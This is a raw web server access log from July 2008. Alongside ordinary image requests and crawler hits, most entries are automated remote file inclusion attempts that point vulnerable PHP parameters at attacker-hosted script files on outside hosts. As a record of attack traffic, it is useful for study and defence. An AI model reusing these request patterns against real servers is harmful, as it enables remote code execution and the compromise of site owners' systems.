209.52.176.119 - - [30/Jul/2008:20:50:17 -0500] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
58.69.172.67 - - [30/Jul/2008:20:50:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.52.176.119 - - [30/Jul/2008:20:50:17 -0500] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:17 -0500] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:18 -0500] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:18 -0500] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:18 -0500] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:18 -0500] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:18 -0500] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
218.234.21.22 - - [30/Jul/2008:20:51:52 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
89.97.0.11 - - [30/Jul/2008:20:52:23 -0500] "GET /logs//phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
89.97.0.11 - - [30/Jul/2008:20:52:24 -0500] "GET //phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
74.6.7.176 - - [30/Jul/2008:20:52:25 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [30/Jul/2008:20:52:26 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.166.92 - - [30/Jul/2008:20:52:28 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:52:29 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:52:29 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:52:46 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:52:47 -0500] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:52:48 -0500] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:53:07 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:53:08 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
89.108.64.96 - - [30/Jul/2008:20:56:24 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
89.97.0.11 - - [30/Jul/2008:20:56:37 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
89.97.0.11 - - [30/Jul/2008:20:56:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
201.130.79.132 - - [30/Jul/2008:20:56:46 -0500] "GET /logs/access_log.1212883200//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:20:56:46 -0500] "GET //tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:20:56:47 -0500] "GET /logs//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.64.96 - - [30/Jul/2008:20:56:53 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
89.108.64.96 - - [30/Jul/2008:20:56:53 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
218.234.21.22 - - [30/Jul/2008:20:58:29 -0500] "GET /logs/access_log.1214438400//joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
218.234.21.22 - - [30/Jul/2008:20:58:30 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
218.234.21.22 - - [30/Jul/2008:20:58:30 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:58:38 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:58:39 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
83.12.119.178 - - [30/Jul/2008:20:59:44 -0500] "GET //atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
218.234.21.22 - - [30/Jul/2008:20:59:53 -0500] "GET /logs/access_log.1212883200//joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
218.234.21.22 - - [30/Jul/2008:21:00:02 -0500] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
218.234.21.22 - - [30/Jul/2008:21:00:04 -0500] "GET /logs/access_log.1213315200//joomla/index.php?option=com_restaurante&task=http://h-pro.ru/lang/inc? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
67.19.204.226 - - [30/Jul/2008:21:00:16 -0500] "GET /logs/access_log.1215043200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:00:16 -0500] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:00:17 -0500] "GET /logs/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:00:17 -0500] "GET /logs/access_log.1216339200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
209.47.165.69 - - [30/Jul/2008:21:00:22 -0500] "GET /logs/?sourcedir=http://olivegreensonline.com/Forms/safe.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
209.47.165.69 - - [30/Jul/2008:21:00:22 -0500] "GET /?sourcedir=http://olivegreensonline.com/Forms/safe.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:00:54 -0500] "GET /logs/access_log.1213833600/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:01:35 -0500] "GET /logs/access_log.1212278400/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
83.12.119.178 - - [30/Jul/2008:21:01:49 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.19.204.226 - - [30/Jul/2008:21:02:31 -0500] "GET /logs/access_log.1210809600/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
89.97.0.11 - - [30/Jul/2008:21:02:31 -0500] "GET /phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
201.130.79.132 - - [30/Jul/2008:21:03:08 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.19.204.226 - - [30/Jul/2008:21:03:22 -0500] "GET /logs/access_log.1216339200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:03:24 -0500] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:03:24 -0500] "GET /logs/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:21:03:35 -0500] "GET /logs/access_log.1215043200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
201.130.79.132 - - [30/Jul/2008:21:04:08 -0500] "GET /logs/access_log.1216339200//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:08 -0500] "GET //ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:08 -0500] "GET /logs//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:08 -0500] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:10 -0500] "GET //ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:10 -0500] "GET /logs/access_log.1216339200//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:10 -0500] "GET /logs/access_log.1215648000//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:20 -0500] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:28 -0500] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:29 -0500] "GET /logs/access_log.1216252800//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:04:31 -0500] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:21:04:42 -0500] "GET /logs/access_log.1213315200/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 376 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:21:04:42 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:21:04:42 -0500] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:05:15 -0500] "GET //ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:05:15 -0500] "GET /logs/access_log.1216339200//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:05:16 -0500] "GET /logs//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
217.20.112.119 - - [30/Jul/2008:21:05:31 -0500] "GET /logs/access_log.1183075200 HTTP/1.1" 200 173193 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4222)"
67.19.204.226 - - [30/Jul/2008:21:05:41 -0500] "GET /logs/access_log.1212278400/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
87.118.98.3 - - [30/Jul/2008:21:05:42 -0500] "GET /logs/access_log.1215648000//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:05:55 -0500] "GET /logs/access_log.1215648000//ashnews.php?pathtoashnews=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:05:57 -0500] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:06:09 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:06:10 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:06:10 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.19.204.226 - - [30/Jul/2008:21:06:16 -0500] "GET /logs/access_log.1210809600/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
201.130.79.132 - - [30/Jul/2008:21:06:53 -0500] "GET /logs/access_log.1212883200//tools/send_reminders.php?noSet=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:06:55 -0500] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:06:56 -0500] "GET /logs/access_log.1216252800//ashnews.php?pathtoashnews=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
74.6.18.231 - - [30/Jul/2008:21:07:01 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.166.92 - - [30/Jul/2008:21:07:22 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:07:23 -0500] "GET //config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:07:23 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:08:03 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:08:04 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
195.95.229.220 - - [30/Jul/2008:21:08:14 -0500] "GET /logs/access_log.1213315200/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:08:14 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:08:14 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:08:15 -0500] "GET /logs/access_log.1213142400/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.245.166.92 - - [30/Jul/2008:21:08:54 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
195.95.229.220 - - [30/Jul/2008:21:09:17 -0500] "GET /logs/access_log.1212883200//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.150.164.61 - - [30/Jul/2008:21:10:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:10:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:10:34 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
210.245.166.92 - - [30/Jul/2008:21:10:44 -0500] "GET /logs/access_log.1213315200//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
202.30.194.70 - - [30/Jul/2008:21:11:01 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:11:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:11:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
190.81.184.98 - - [30/Jul/2008:21:11:16 -0500] "GET /logs/access_log.1214438400/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 376 "-""libwww-perl/5.805"
195.95.229.220 - - [30/Jul/2008:21:11:16 -0500] "GET /logs/access_log.1213315200//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.150.164.61 - - [30/Jul/2008:21:12:05 -0500] "GET //netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:12:05 -0500] "GET /logs//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:12:05 -0500] "GET /logs/access_log.1216598400//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
195.95.229.220 - - [30/Jul/2008:21:12:30 -0500] "GET /logs/access_log.1213142400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
201.130.79.130 - - [30/Jul/2008:21:12:38 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
201.130.79.130 - - [30/Jul/2008:21:12:38 -0500] "GET /lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
70.84.182.98 - - [30/Jul/2008:21:12:45 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
70.84.182.98 - - [30/Jul/2008:21:12:45 -0500] "GET /lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
202.30.194.70 - - [30/Jul/2008:21:12:49 -0500] "GET /logs/access_log.1216598400//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:12:49 -0500] "GET //netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:12:49 -0500] "GET /logs//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.84.182.98 - - [30/Jul/2008:21:13:02 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
70.84.182.98 - - [30/Jul/2008:21:13:02 -0500] "GET /lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.106.214.193 - - [30/Jul/2008:21:15:57 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
87.106.214.193 - - [30/Jul/2008:21:15:57 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:21:15:59 -0500] "GET /logs//forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:21:16:00 -0500] "GET //forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:21:16:00 -0500] "GET /logs//forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:21:16:01 -0500] "GET //forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
213.254.226.234 - - [30/Jul/2008:21:17:23 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
